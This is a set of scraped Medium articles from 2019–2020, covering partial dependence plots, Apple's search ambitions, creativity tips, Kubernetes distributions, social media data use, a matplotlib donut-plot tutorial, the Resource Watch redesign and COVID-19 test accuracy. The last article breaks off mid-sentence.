climate-smart option for customers feeling guilty about themselves and their carbon footprint. In that case, if someone chooses ‘X5’ = ‘ag’ (which, remember, is the fuel-efficient type of tire), they’re most likely not going to choose ‘a’ as their AC because why order a cheeseburger combo with a diet Coke? However, for every data point in our dataset, partial dependence pairs all classes in ‘X5’ with it, even if the new rows are erroneous. This issue can be illustrated as follows: Original: +------+------+------+----+-------+ | X314 | X119 | X127 | X5 | X1000 | +------+------+------+----+-------+ | 0 | 0 | 1 | ag | y | | 1 | 1 | 1 | ag | z | | 1 | 0 | 0 | aa | a | | 0 | 0 | 0 | aa | b | +------+------+------+----+-------+ Partial dependence for 'X5' = 'aa' +------+------+------+----+-------+ | X314 | X119 | X127 | X5 | X1000 | +------+------+------+----+-------+ | 0 | 0 | 1 | aa | y | | 1 | 1 | 1 | aa | z | | 1 | 0 | 0 | aa | a | | 0 | 0 | 0 | aa | b | +------+------+------+----+-------+ Partial dependence for 'X5' = 'ag' +------+------+------+----+-------+ | X314 | X119 | X127 | X5 | X1000 | +------+------+------+----+-------+ | 0 | 0 | 1 | ag | y | | 1 | 1 | 1 | ag | z | | 1 | 0 | 0 | ag | a | | 0 | 0 | 0 | ag | b | +------+------+------+----+-------+ Please note that, in the first example, climate-smart ‘X5’ options (‘ag’) go with climate-smart ‘X1000’ options (‘y’ and ‘z’) and carbon-emitting ‘X5’ options (‘aa’) go with carbon-emitting ‘X1000’ options (‘a’ and ‘b’), as is expected from customers with different views on climate-related issues. But in the second and third examples, climate-smart ‘X5’ options go with carbon-emitting ‘X1000’ options and carbon-emitting ‘X5’ options go with climate-smart ‘X1000’ options, which is the opposite of what is expected from (both green and non-green) customers. This could potentially be a problem because: Our model can’t make accurate predictions for rows which aren’t from the same distribution as our training set or Even if our model is nearly perfect when it comes to generalization, some rows might not even make theoretical sense and hence, we shouldn’t include them when doing partial dependence. Such an example would be a car made in the 1800s equipped with a turbocharger, etc. And lastly, perhaps partial dependence’s biggest problem in real-world machine learning is the amount of time it could take. For a dataset with a couple hundred thousand rows and a few hundred features with high cardinalities, performing partial dependence would be infeasible, especially if our model takes long for inference. A typical workaround is using only a small subset of the rows we’re given or doing partial dependence only for the features we really care about (the former shouldn’t change the results drastically as long as our mini-dataset is representative of the actual one). Despite all its imperfections, however, partial dependence is still an extremely powerful tool which enables you to gain insights into your dataset which traditional EDA methods simply can’t and these insights could then be turned into better business decisions which could maximize profit and impact. There are numerous such examples, and here we’ll go through one together. Bulldozer Auction A while ago, I wrote a series about a Kaggle competition where the goal was to successfully predict the auction price of a bulldozer given various features such as its size, the ID of the auctioneer, and a lot more, with most being technical terms not everyone (including me) understands. In one of the later articles, we realized the column containing the year the bulldozers were made (‘YearMade’) is very important to our model’s performance, which is probably no surprise to bulldozer professionals. However, we didn’t know how ‘YearMade’ affects the sale prices of the heavy equipment: Do they increase monotonically? Maybe plotting ‘YearMade’ against the dependent variable be all over the place? Or perhaps as ‘YearMade’ increases the sale price decreases? Logically, the first scenario should be the case but we need a way to prove that. You can probably see where this is going… The first thing that jumps to mind is taking the average of all sale prices for all years and seeing what that gives us. If our hypothesis is indeed true, we should get an increasing line/curve, right? But it turns out if we do that, there’d be a dip around ‘YearMade’ = 2000, which would mean bulldozers made in the early 1990s sell for more than the ones made in the late 1990s, contrary to our speculation. Picture from the ‘Introduction to Machine Learning for Coders’ course The organizers of the auctions might then decide since bulldozers made in the late 1990s sell for less than the ones made in the early 1990s, the former isn’t worth their time so they’ll stop auctioning it. By now, you should be suspicious of conclusions drawn by taking averages and resort to using partial dependence instead. If you do so for this bulldozer dataset, the result will be very different from the above graph and confirm our initial hypothesis. Picture from the ‘Introduction to Machine Learning for Coders’ course Please note that the yellowish line is what we should be looking at (just ignore the blue ones for now) and the y-axis is the log of the dependent variable. As we can see, ‘YearMade’ and the y-axis have an almost linear relationship which means in reality, sale prices grow exponentially with respect to the year our bulldozers were made. There are a few possible explanations for the inconstistency between the two plots: Recession, difference between the quality of the bulldozers made during various time intervals, etc. Whichever the case, however, we can be certain if two bulldozers are identical in all ways but the year they were made, the older one will have a lower sale price. But if the auction organizers make their decisions based on the initial plot, they wouldn’t know that and would lose big sums of money by not auctioning heavy equipment made in certain years. Conclusion In this part, we saw how partial dependence works behind the scenes and frankly, it’s not very complicated: In order to calculate the true average of the dependent value for a category c (or a continuous value) in a feature F, it sets F to c for all rows in our dataset (or a subset of it, if it’s too big) and uses a predictive model to figure the dependent values for these modified rows. It then takes the averages of the predictions made by our model and that’s basically what we’re looking for (there are a few other steps involved but that’s the general idea). Admittedly, partial dependence does come with its own particular challenges, the major ones being the issue of some categories not being compatible with each other (a car made in the 1800s with autopilot) and the fact that it can be time- and resource- consuming sometimes. Nevertheless, it’s still a great tool to have in your toolbox and can aid you in making business decisions and drawing meaningful insights from your dataset. In the next part, we’ll look at how to implement partial dependence in Python using a powerful library called PDPBox, which comes with beautiful visualizations and several other useful related tools. To be continued… Please, if you have any questions or feedback at all, feel welcome to post them in the comments below and as always, thank you for reading! Part 1: https://medium.com/python-in-plain-english/mercedes-benz-greener-manufacturing-part-1-basic-data-pre-processing-a32d17803064 Part 2: https://medium.com/python-in-plain-english/tackling-kaggles-mercedes-benz-greener-manufacturing-competition-with-python-3ddff72d0187 Part 3: https://medium.com/python-in-plain-english/tackling-kaggles-mercedes-benz-greener-manufacturing-competition-with-python-1ca6b030bf58 Part 3 (continued): https://medium.com/python-in-plain-english/tackling-kaggles-mercedes-benz-greener-manufacturing-competition-with-python-b5220f479a44 Part 3 (continued): https://medium.com/python-in-plain-english/tackling-kaggles-mercedes-benz-greener-manufacturing-competition-with-python-a004659e02c4 Part 4: https://medium.com/python-in-plain-english/tackling-kaggles-mercedes-benz-greener-manufacturing-competition-with-python-82dd27e53757 Part 5: https://medium.com/python-in-plain-english/tackling-kaggles-mercedes-benz-greener-manufacturing-competition-with-python-e31198ecafae Part 5 (final part): https://medium.com/python-in-plain-english/tackling-kaggles-mercedes-benz-greener-manufacturing-competition-with-python-ecbd2714d952 Twitter: https://twitter.com/bobmcdear GitHub: https://github.com/bobmcdear
https://medium.com/python-in-plain-english/tackling-kaggles-mercedes-benz-greener-manufacturing-competition-with-python-7b203e886f8d
['Borna Ahmadzadeh']
2020-12-27 18:10:47.421000+00:00
['Machine Learning', 'Artificial Intelligence', 'AI', 'Data Science', 'Data Visualization']
How Apple Can Make Money Through a Search Engine
OPINION How Apple Can Make Money Through a Search Engine How Apple can make up for losing $12 Billion Created with Canva Design Congress wants to break Google, claiming it has illegally thrashed the competition in the search engine market. Google dominates the market with an 86.86% market share as of July 2020. The argument is that Google pays billions of dollars to other companies to become the default search engine for its consumers. In 2019, Google paid $30bn for “traffic acquisition costs”, almost a third of its entire search revenue. This was up from $26.7bn the previous year, and up from just $6.2bn a decade earlier. Google reportedly paid $12 Billion to Apple to make Google the default search engine on Safari for iPhones. This means that if Google is regulated, Apple would lose around $12 Billion each year, which amounts to 1/5 of all its services revenue. Apple depends on Google, and their ties can be cut anytime. As an alternative, Apple is rumored to be working on its own search engine — Apple Search. So, how Apple plans to monetize it and make up for $12 Billion?
https://medium.com/datadriveninvestor/how-apple-can-make-money-through-a-search-engine-12e018a58154
['Shubh Patni']
2020-11-14 14:06:37.266000+00:00
['Technology', 'Google', 'Apple', 'Innovation', 'Business']
How to Unleash Your Creativity in 30 Minutes a Day
Give some of the following methods a shot for 30 minutes each day to release your creativity: Nostalgia to the rescue! Harken back to your childhood. Did you have an active imagination? When I was in 3rd grade my teacher, Mrs. Bermudez gave myself and two friends all the extra worksheets she had left over from the year. We took possibly three bags of school work home. I set out to be a teacher. I arranged my teddy bears and dolls, made desks of cardboard boxes, and set out to teach. I did the assignments (since teddy bears cannot write), and pretended to grade their work. The interesting fact? I am a teacher who works with men and women educating them on domestic violence and anger management. Who knew a creative side would turn into a real life career move? Maybe you pretended you were a teacher or a doctor. Or, you thought you were a grand hero, like Spider-man or a famous hunter, playing in the woods. Perhaps you played as if you were the greatest skateboarder or a champion football player. Borrowing different personas is a fun way to show your creativity. Right now, imagine yourself as a successful and talented worker at your current profession. What would you wear? What about behaviors, your style, or your hairdo? What would you communicate to others or to the media? How would you relate? Visualize that you’re the greatest at something you enjoy doing for at least 10 minutes each day. If you can see it, you can achieve it. What are you good at? Imagination is powerful. As you develop the skills of creativity, you’ll find the ability to focus on what you excel at and what you’ve accomplished. Do you have specific skills or talents which you thrive in discussing? For the next 10, 20, or 30 minutes, consider your various skills, talents, and knowledge base. After your mind has toyed with the ideas, pick one skill to focus upon with intention. What makes you shine with particular ability you chose? Are you focused and follow instructions well? What about listening skills or speaking skills? If you noticed what others say, or feel when they share their thoughts, you can write about the way you are impacted. You quickly pick up on what’s expected of you. Consider if you find yourself internally motivated to accomplish jobs in a timely manner, or you can find ways to improve work performance. Take some time to write out how you create time saving documents or lists. When you know what you excel at, you feel confident. And when you’re confident, you’re not afraid to try new things and experiment (which are aspects of being creative). Let your mind fantasize about anything amazing in your life. My brother used to dream about buying an expansive house on the hill in Washington State. He’d tell me what he would do and how he’d have a room just for model making. Maybe, you’ll thrive with dreaming about a love relationship. Give yourself 30 minutes to sit back and dream. Imagine what the inside of the house looks like. Consider where you’d have a craft room, or even a holiday feast. Picture the face of a potential mate. Imagine what your first encounter would be and what you will wear to meet them. Create and laminate an index card for your pocket. On the index card, write your top 3 life goals. Keep the card in an easy place to take out and look at when you have a few minutes. The concept here is to remind yourself of the goals and dreams you have. Your future self needs to be reminded in the present of what you love, long for, and plan to accomplish. Ponder how you want to achieve the goals. Savor the victory. Cherish the wish. And visualize yourself arriving with accolades of honor. Remember, you hold the creative power to pursue every goal. You decide the process. Let your mind run free. Consider the following questions: what can you do today, tomorrow, next week, and next month to go after your goals? What mini steps can you take today to get you headed toward tomorrow’s success? Take massive action to head toward your dreams. Role models help us grow. Identify someone you admire or hold in high regard. I enjoy the research involved in studying about famous psychologists, neurologists, or criminal forensic scientists. The ideas they present inspire my work with the justice system helping prevent violence. As I consider their history, I success, and focus I become inspired to keep pursuing the dreams. Ask yourself, what is it about them you like? How would your life improve if you acted or believed as they do? Sometimes the personality or the traits we see in others makes us feel happy, or content. If we were to act as if we had the same trait we’d begin to demonstrate the same behaviors. Usually if you are around someone for 10 minutes a day, you’ll start acting like the person. Be mindful who you study! For the next month, emulate the characteristic you admire. Maybe Joe gets to work on time, has a positive attitude, and tackles the job without criticizing the managers or leaders. As you notice the different characteristics of Joe, you may start to emulate him by ceasing negative self-talk about the leadership team, even if you feel justified. Find a way to look at the good around you and share what you see. Trying on new personal characteristics allows you to stretch yourself creatively to see what you can do. Try something new. Experiment with a new creative activity. Explore arts and craft stores: buy a block of clay, a jewelry-making kit, or some paints and canvases. Look on Pinterest for ideas of Do-It-Yourself creative ideas. Find a way to incorporate the artistic side once a week into your schedule. As we cultivate creativity we build an artistic side to us we may have not realized in the past. · One of the benefits of setting a time (30 minutes), limit on the project, means you do not have to complete it all in one setting. It’s possible you’ll spend over the half-hour mark, however, it’s the creativity you are looking at, not necessarily the time. Your skills will expand, and your time for ‘away’ from work activities becomes an event you look forward to. Art or creative craft classes at local stores may be perfect to get you interested. Sometimes they are classes you take once, and then move on, or at other times they are several weeks, once a day. Start with what feels comfortable for you. As you build creativity in your life, you’ll begin to feel the imagination take off. Working with your hands and mind together opens up new avenues. Release the innovator inside. Delve into 30 minutes of pure invention-focused growth. When you focus your energy on any of the above strategies, or connect 2 or 3 of them together you’ll find yourself developing a new set of coping strategies, reducing stress, becoming and building resourcefulness, as well as connecting with the younger version of you. Believe in yourself. You are a creative individual. As you feel more confident, you’ll prove you have talent. Take the time to do something which cultivates your imagination and originality either daily or weekly. As I consider my favorite artist side, I realize I have let it slide too much and need to return to my first love: the arts. Maybe, after you read the above article, you too want to delve in and explore a side of you not yet found, or one which lays dormant under the surface of hustle and bustle. I encourage you to step up and find the artist inside! ~Just at thought by Pamela
https://medium.com/change-your-mind/how-to-unleash-your-creativity-in-30-minutes-a-day-44160ec32737
['Pamela J. Nikodem']
2020-11-21 11:02:37.873000+00:00
['Self', 'Mental Health', 'Growth', 'Creativity', 'Art']
You had a lot to say this week
I love when I can read someone else’s work and feel the energy of the piece. It’s like the words are lightning bolts that leap off the page and charge my mind. That feeling happened a lot this week and our writers are to thank. They delivered moving monologues on love, fear, absence and guilt. Here’s what you missed: I also jumped in the mix this week with a piece titled Chaos and Creativity. It’s a short think piece on our ability to create through strained conditions. We already have more stories coming in so next week promises to be equally as inspiring. Keep submitting. We’re staying open to submissions over the holidays so if you feel like you have something to say, say it. We’ll publish it.
https://medium.com/cry-mag/you-had-a-lot-to-say-this-week-a6246e939852
['Kern Carter']
2020-12-12 12:46:45.529000+00:00
['Newsletter', 'Fear', 'Creativity', 'Love', 'Writing']
Kubernetes Distributions — What Are They?
Kubernetes Distributions — What Are They? Learn what they are and why it matters to you Photo by Drew Beamer on Unsplash One of the biggest announcements from the latest AWS re:Invent 2020 sessions were the release of EKS-D from Amazon. EKS-D is their open-source Kubernetes distribution that’s now available for everyone to start using in their cloud provider or even on premises. It’s based on past findings and the entire process Amazon has undergone in managing their Kubernetes managed platform, Amazon EKS. These announcements have many people asking themselves: “OK, I know Kubernetes, but what’s a Kubernetes distribution? And why should I care?” So I’ll try to answer that with the knowledge I have, and I always try to use the same approach: a Kubernetes versus Linux model comparison. Kubernetes is an open-source project, as you know, started by Google and now being managed by the community and the Cloud Native Computing Foundation (CNCF), and you can find all the code available here: But let’s be honest: Not many of us are pulling that repo and trying to compile it to provide a cluster. That’s not how we usually work. If you follow the code path — downloading it, building it, and so on — this is usually named vanilla Kubernetes. If we start with the Linux comparison, it’s the same situation as we have with the Linux kernel that most of the Linux distribution ships, but this is already compiled and available with a bunch of other tools all working together via the usual approach. So that’s what a Kubernetes distribution is. They build Kubernetes. They provide other tools and components to enhance or provide more features and to focus on additional aspects like a security focus, a DevOps focus, or another focus. Another concept that usually is raised is the purity of distribution, and we try to talk about distribution that’s pure. We call a distribution pure when it’s building Kubernetes, and that’s it. It leaves everything else to the developers or users to decide what they want to use on top of it.
https://medium.com/better-programming/kubernetes-distributions-what-are-they-be2c438c8706
['Alex Vazquez']
2020-12-28 16:38:12.254000+00:00
['Software Development', 'AWS', 'Kubernetes', 'Containers', 'Programming']
Don’t Sell Your Emotions on Social Media
Before reading the article, I would like it if you take some time and think about the changes in your social and professional behavior since you have started using social media. Have you got anything? No! Don’t worry. Take a long breath and start reading the article. “THE TECHNOLOGY THAT CONNECTS US, ALSO CONTROLS US.” — Social Dilemma Social media isn’t a tool that’s just waiting to be used. It has its own goals and it has its own means of pursuing them. There are 3.81 billion social media users in the world with an increase of 9.2% users every year. Have you ever think why there is so much user engagement on these social platforms? Everyone is fascinated by social media features. It helps in making the users feel involved. It helps to stay in touch with what my friends are doing, to stay up-to-date with news and current events, to increase general networking with people, to find funny and entertaining content, to share photos & videos with others, to share your opinion on any current issue, and many more. “But what if I tell, you are nothing but a product to sell for the social media!!”. Now you can question me how you are claiming us to be the product? The simple answer is ‘Data’, I don’t know whether you are aware of the facts or not, the AI techniques that are integrated into these social media platforms monitor your smallest to smallest action like an engagement time on a particular post, type of post that you liked, shared or commented, your reaction on the post your friend liked or shared, what’s trending in your area respective to the GPS location, types of accounts you search for or follow them. Collecting all this data, media giants understand your interests, likes, dislikes, perceptions, motives, nature, and most importantly your emotions. Now if I would like to summarize what I stated until now, then I would say, “YOU ARE TRAPPED!!” Photo by Artyom Kim on Unsplash I think you got a glimpse of an idea about the objective of the article. Let’s divide the article into two parts now, first why I said you are the product to sell? and second, why I exclaimed you are trapped!! The complex to complex algorithms designed by the expertise in social media giants totally worked on the data you provide them on your clickable actions and post engagements. Consider a situation where you are liking animal posts continuously 10–12 times, then a human will easily figure out that you are fond of animals but what in the case of machines? Analyzing the data, understanding your behavior, finding out the patterns, and test the learnings with your emotions. That’s how they build the predictive models, forecast the outcomes, and get constantly updated with the new data. Now just think, I am running a company that deals with the manufacturing of gym types of equipment and sells in the market. Now I want help from social media, so I sponsor an ad just like say on Instagram charged of a certain amount and hoping for high customer engagement. Now think, you live near my company’s location and you are a fitness freak that Instagram knows. Then of course you will get the ad on your Instagram feed and will manipulate you to buy the types of equipment and if in case you are looking for some cool stuff and you like the products mentioned in the ad then you will sure to purchase it and obviously, I will say I got a new a customer. “That’s great! How cool is social media!” Now again you can question me that what’s the wrong deal about this, after all, I got what I want. It’s of my interest so it’s good that I purchased it. But deeper down when you will think about it, you will understand that social media sold you because you are the perfect customer for that type of product. Instagram knows you have liked this much count of fitness posts, you follow fitness influencers, you share fitness posts and many more. That’s where your interests play a vital role. They are utilizing your data to suggest the best possible recommendations and in return, you can't restrict yourself to purchase it. That’s the same predictive modeling is used in maintaining your social media feeds where you get videos recommendations, post referrals, or product ads based on your interest and indirectly they force you to involve in these things and spend more time scrolling the posts, buying the items which in turn make huge revenues for them. The recommendation engines are that much capable to keep track of your every action and updating the suggestions continuously so that you can’t able to detach it from yourself. You repeatedly scroll your feed and keep the flow on. Whenever we search for a product on e-commerce sites, after viewing 2–3 items we get the same product ad on our social media feed, email, etc. They are playing with your mindset, they push notifications after a certain interval of time so that their ultimate goal of keeping you involved is achieved and lastly you will be get manipulated to purchase that product. Coming back to my second exclamation, You are trapped!! Excess of anything is harmful if you are unable to feel it at present then for sure you will experience it in the future. I would like to share some social media facts which will disturb you for sure. Photo by Sydney Sims on Unsplash 95% of social media using teens have witnessed cruel behavior on social networking sites. of social media using teens have witnessed In the world, 80% of teens use Facebook , and 54% of those experienced cyberbullying. of teens use , and of those experienced 9X higher chances of identity fraud . . Engaging in dangerous & harmful activities including reckless behavior, substance abuse, or self-injury. including reckless behavior, substance abuse, or self-injury. Higher risk of depression , trouble in sleeping , ongoing sadness , losing interest from favorite activities. , trouble in , ongoing , losing interest from favorite activities. Sharing of inappropriate content/misinformation distribution. distribution. Relationship threats , abuse, intimidation, faking perfection , social comparison, and self-esteem increase. , abuse, intimidation, , social comparison, and self-esteem increase. 140–150 mins daily time spent on social networking sites worldwide. 39,757 years collectively spent per day on FACEBOOK . daily time spent on social networking sites worldwide. collectively spent per day on . 25% of the users have admitted to being distracted during intimacy . 14% have risked their own safety. of the users have admitted to being distracted during . have risked their own safety. According to MIT Research , fake news spread 6 times faster than real news on Twitter . , news spread faster than news on . 62% of the population worldwide confesses to believing fake news. of the population worldwide confesses to believing fake news. 89% of Americans believe that social media is responsible for spreading misinformation. of Americans believe that social media is for spreading misinformation. 29% of the population deleted/removed social media accounts because they felt overloaded by it. of the population because they by it. The Prime Minister of India Narendra Modi has 60% of fake followers on Twitter while US President Donald Trump has 37% and Congress Party Member Rahul Gandhi has 69% of fake followers on Twitter. Social media growth in India, which has risen from 137 million to over 600 million in 2019 leads to fake news distribution (230 million Whatsapp users highest in any country). There are only two industries that call their customer’s ‘USERS’: ILLEGAL DRUGS & SOFTWARE Now after reading all these facts, just ask yourself where you are using these social media platforms effectively or rising problems for yourself. If we think about fake news distribution, we can’t trust anyone who is sharing real news. If we think of a social comparison, we can’t decide whether the guidance of any person will be beneficial for us or not. If we think about relationships, we never know when we will get disheartened and that will lead to depression and anxiety. Social media is an unauthorized spy who knows everything about you like interests, mental condition, week plan, location, birthday, relationship, health, habits, next food order, visits, mentor, success, failures, and many more things that you also don’t know about yourself. “Social media is training us to compare our lives, instead of appreciating everything we are. No wonder why everyone is always depressed”. — Bill Murray S haring our data is our responsibility, what to share, when to share, how to share, why to share, whom to share all these things will be responsible for your future actions. Photo by Ross Findon on Unsplash In the end, I request you it’s a social life please don’t make it so much personnel. Don’t post your feelings. Don’t share your emotions. This is not the kind of world where you think I will get genuine advice from others, Nooo! don’t expect this from social media. There are so many people gonna judge you based on your post engagements, make perceptions on it but you just want to trick them. Enjoy your weekend fully social media free, spent time with the loved ones, and invest time in your favorite activities. Finally, I will suggest you think about your current situation and work on your mentality to utilize such social media platforms in a more effective way so that it will help in your potential growth. Don’t use social media to impress people, utilize it to impact people. I hope this article brings out a valuable change in your social & personnel life. Thanks for reading the article. Now it’s up to you, choose wisely.
https://medium.com/plus-marketing/dont-sell-your-emotions-on-social-media-6079735e2dc6
['Amey Band']
2020-11-20 13:26:12.067000+00:00
['AI', 'Social Media', 'Emotional Intelligence', 'Instagram', 'Facebook']
Donut Plot with Matplotlib (Python)
Donut Plot with Matplotlib (Python) Let’s start by praising visualizations with a very famous English language adage. It’s cliche but dead on. “A picture is worth a thousand words” In this post, I’ll demonstrate how to create a donut plot using matplotlib with python. Donut plot is a very efficient way of comparing stats of multiple entities. As per [1] Just like a pie chart, a doughnut chart shows the relationship of parts to a whole, but a doughnut chart can contain more than one data series. Each data series that you plot in adoughnut chart adds a ring to the chart. Now let’s use the following dummy data representing the usage of mobile applications of different social media websites. ╔═════════════════╦══════════╗ ║ Social Media ║ Usage ║ ╠═════════════════╬══════════╣ ║ Twitter ║ 60 % ║ ║ Facebook ║ 75 % ║ ║ Instagram ║ 80 % ║ ╚═════════════════╩══════════╝ Following is the code for creating a donut plot. import pandas as pd import re data = pd.read_csv('testdata.csv') print(data.head()) import matplotlib.pyplot as plt # create donut plots startingRadius = 0.7 + (0.3* (len(data)-1)) for index, row in data.iterrows(): scenario = row["scenario"] percentage = row["Percentage"] textLabel = scenario + ' ' + percentage print(startingRadius) percentage = int(re.search(r'\d+', percentage).group()) remainingPie = 100 - percentage donut_sizes = [remainingPie, percentage] plt.text(0.01, startingRadius + 0.07, textLabel, horizontalalignment='center', verticalalignment='center') plt.pie(donut_sizes, radius=startingRadius, startangle=90, colors=['#d5f6da', '#5cdb6f'], wedgeprops={"edgecolor": "white", 'linewidth': 1}) startingRadius-=0.3 # equal ensures pie chart is drawn as a circle (equal aspect ratio) plt.axis('equal') # create circle and place onto pie chart circle = plt.Circle(xy=(0, 0), radius=0.35, facecolor='white') plt.gca().add_artist(circle) plt.savefig('donutPlot.jpg') plt.show() Donut Plot On the very core, donut plot here in this code is being created by creating a series of pie charts of different radiuses one on top of the other with a white circle in the center. References [1] https://support.office.com/en-us/article/present-your-data-in-a-doughnut-chart-0ac0efde-34e2-4dc6-9b7f-ac93d1783353
https://towardsdatascience.com/donut-plot-with-matplotlib-python-be3451f22704
['Asad Mahmood']
2019-06-12 22:17:54.482000+00:00
['Data Sceince', 'Matplotlib', 'Python', 'Data Visualization']
How we made Resource Watch even easier to use.
Design and user research go hand in hand when it comes to product development. Both are essential if you want to make a product that is useful, usable, and used. We’ve been working with the Resource Watch team at World Resources Institute (WRI) on a redesign that makes planetary data easier to use. I spoke with Dani Caso (Designer) and Martin Dubuisson (User Researcher) to find out more. So, why did Resource Watch get a redesign? Dani: User research done by Martin revealed several things that we could improve in terms of the user experience on Resource Watch. Rather than taking each problem one by one and finding isolated solutions, we decided it made more sense to reconfigure the whole space. Martin: The Explore page — a sort of library of open-source global datasets that can be accessed and visualized on a map — is really the core offering of Resource Watch. Over the years the page has hosted a growing number of datasets on a vast array of different topics. In our conversation with users, many had described the Explore page as “overwhelming”. Yes, they can search for datasets in the search bar, but some users weren’t sure which words they should type or which datasets are available. Our main challenge was to represent the breadth of the data, invite exploration, and inspire (which are key elements of the value proposition to our users). While at the same time providing users with quick access to the datasets they are searching for. In addition to that, we also took advantage of this redesign to tackle a number of other changes, based on needs detected from our previous testing. For example, these included making it easier for users to customise their experience, and removing misleading redirections. We made a conscious decision to work very closely with the Resource Watch team at WRI. We carried out some interviews together, and involved the whole team in a co-analysis session. We asked them to review some recordings of the user testing so that we could discuss them in-depth and cross-reference our interpretations. This was a fun exercise, and more importantly, it helped ensure that the key learnings about users wouldn’t simply end up in a one-directional presentation (and therefore probably quickly forgotten about). Instead, this approach meant that our user insights were built and absorbed by everyone on the team. Members of WRI’s Resource Watch team came to our Madrid office for a co-analysis session where we discussed the findings of the user research in more detail. What information did you use to develop the new design for Resource Watch? Dani: Knowing who your users are and what they need is the first and most important piece of information you need when designing a data platform. Martin’s research told us that policymakers, journalists, and educators were the three key users of Resource Watch. The conversations with people from these three groups also told us that there’s a wide range of experience and knowledge level that we need to cater for. We needed a design that would make the Resource Watch data accessible and usable for all of them. Our goal was to provide the tools that someone needs to be a great analyst. If you’re not an expert on climate data, you’ll need some guidance. If you are a climate data expert, you’ll want the fastest entry point to the most relevant data. When I pitched this approach to WRI, I used the Pixar movie ‘Ratatouille’ as a reference. In that movie, a stuck-up food critic learns that anyone can become a great cook if you give them tools (or a good cook book!) to work with. Our aim is the same with Resource Watch. We’re giving every chef the tools they need to create delicious dishes of data. Martin: On most of our projects, we try to gather as much information as possible about a situation before making decisions. In this case, our main approach was to carry out user testing — showing the new designs to users, hearing their feedback, and analyzing their behavior and words. But we also had a look at quantitative sources too: we looked at Google Analytics (website analytics to get large scale statistics on user behavior), to know, for example, more about the keywords that users enter when doing a search on Resource Watch. Over the years, we’ve developed a more solid understanding of our users. So, we’ve been revisiting our conclusions from previous user testings, to make sure we build on previous blocks of knowledge and gain an increasingly accurate picture. How do you simplify things without losing information? Dani: You simplify things by having everything in order. That doesn’t mean you need to get rid of things. You simply reorganise what you have. It’s like tidying your house and choosing where to put things. You probably won’t throw anything away, but you will put things in places that make them easier to find when you need them. Martin: As a user researcher, it’s my role to find the barriers that block people from finding the information they want. Once we find them, Dani uses design to take them away. Something that our user research team has noticed over and over in many projects, is that most people don’t bother reading long texts — or even long paragraphs — for example those that describe the datasets. Now, this might not come as a big surprise to most of you, we’ve all heard that attention spans are getting shorter. But in most of our projects — where many of our users have scientific backgrounds — we had assumed that they would be keen on reading all the details. Truth is: many science-minded people skim read too, or they just want to go straight to the point. Which means, more often than not, just a few well-worded, well-placed bullet points will do! The design can always include a hyperlink or an additional information button to cater to those who will be keen on reading more. Dani: In the case of Resource Watch, we’ve added customised features that allow users to curate and save the data they regularly use. When we designed this, we took inspiration from playlists and pinterest boards that people use to gather the things they care about most. We also drew inspiration from Netflix and how they categorise movies and tv shows, to help us assemble groups of datasets that relate to one another. The challenge here was to turn an experience that’s often considered boring into something fun! Data doesn’t need to be boring. Information is interesting! So, if we make the digestion of data easier, and let people enjoy it, they will use it! Boring can be a barrier. Data should be understandable, accessible and beautiful. Beauty comes from being understandable and accessible. These are the principles we follow when thinking about design. Every sprint needs a silly moment to help creative ideas flow. What’s your favourite thing about the new Resource Watch? Dani: My favourite thing about the new Resource Watch is that we are opening up new possibilities. We’ve created a stronger foundation from which we can grow. We’re turning our attention to better mobile design, and the design choices we’ve made up to now will make that next step easier to do. We’ve also opened up new possibilities for user customisation. I’m already feeling excited about the new things that will come in the future. Humans thinking for humans is what makes Resource Watch so special. We took the time to select which datasets should be offered up to each user. We haven’t relied on an algorithm to make those choices. When a user chooses a dataset, the recommendations they see will be contextually related and suggested by another human. Martin: I feel there is something cute and compact about the new Resource Watch, a bit like what Dani was saying before: you’re not getting rid of anything, it’s more that datasets are much more visible and ordered, as if it were a very tidy cupboard. I also really like the great job that the team did on the “explanations” (metadata) page of each dataset. In the new design, instead of redirecting users to a new page, the key bits of information have been condensed, so that they can now just fit into an elegant sidebar solution. Users can read the text information, and yet not lose sight of the map! Learn something new about our planet today on the Resource Watch explore page!
https://medium.com/vizzuality-blog/how-we-made-resource-watch-even-easier-to-use-37c21550a8a9
['Camellia Williams']
2020-07-15 13:50:47.657000+00:00
['Environment', 'User Research', 'Design', 'UX', 'Data']
How Accurate and Reliable is COVID-19 Testing?
COVID-19 / MEDICINE / HEALTH How Accurate and Reliable is COVID-19 Testing? PCR-based nasal swab testing and serological antibody testing both have certain limitations. As more and more state health departments and private enterprises continue to ramp up testing capacity for COVID-19, several health experts warn that test results are not 100 percent accurate and should be interpreted in the context of clinical presentation and exposure risk. The most commonly used PCR-based nasal swab test to detect SARS-CoV-2 is highly specific but not very sensitive, meaning positive results are more useful than negative results. In other words, a positive result almost guarantees infection with the novel coronavirus but a negative result cannot rule out the presence of infection. “The issue with the tests for the SARS-CoV-2 virus is that there has not been time to test them rigorously before deploying them in the field,” says Dr. Gary L. LeRoy, president of the American Academy of Family Physicians. “Most polymerase chain reaction (PCR) and antibody tests have years of laboratory testing before they are used. We just don’t have that kind of time. The major concern for false negatives is someone who tests negative, thinking they are not infected, could unknowingly spread the virus into the community.” Healthcare worker administers nasal swab test for COVID-19 at a drive-thru facility (Photo by Zstock) An article published in Mayo Clinic Proceedings draws attention to the risk posed by over-reliance on COVID-19 testing to make public health decisions. Priya Sampathkumar, M.D., an infectious diseases specialist at Mayo Clinic and study co-author, writes that healthcare officials should anticipate a “less visible second wave of infection from people with false-negative test results.” Based on preliminary evidence from China, quantitative reverse transcription polymerase chain reaction (qRT-PCR) COVID-19 testing on nasal swab samples may produce false negatives up to 30% of the time when testing is conducted 0–7 days after illness onset. After 15 days of illness, the chance of receiving a false negative result shoots up to 50%. That false negative figure may be even higher in the US, according to Harlan Krumholz, M.D., a professor of medicine at Yale. In an opinion piece for The New York Times, Dr. Krumholz expounds: “There are many reasons a test would be falsely negative under real-life conditions. Perhaps the sampling is inadequate. A common technique requires the collection of nasal secretions far back in the nose — and then rotating the swab several times. That is not an easy procedure to perform or for patients to tolerate. Other possible causes of false negative results are related to laboratory techniques and the substances used in the tests…If you have had likely exposures and symptoms suggest Covid-19 infection, you probably have it — even if your test is negative.” Nasal swab sample for COVID-19 test in the laboratory (Photo by Robert Kneschke) Dr. Alain Chaoui, head of Congenial Healthcare, a practice with 50,000 patients across five locations in Massachusetts, told The Boston Globe, “A lot of my patients who have symptoms, who I clinically think have COVID-19, are testing negative.” Chaoui is nonetheless advising all his patients who test negative for the virus to assume they are infected and self-quarantine until symptom-free for at least 72 hours. Michelle Taylor tested negative for COVID-19 twice despite presenting with concerning symptoms, including loss of taste and smell. Several doctors have said the long swabs inserted deep into 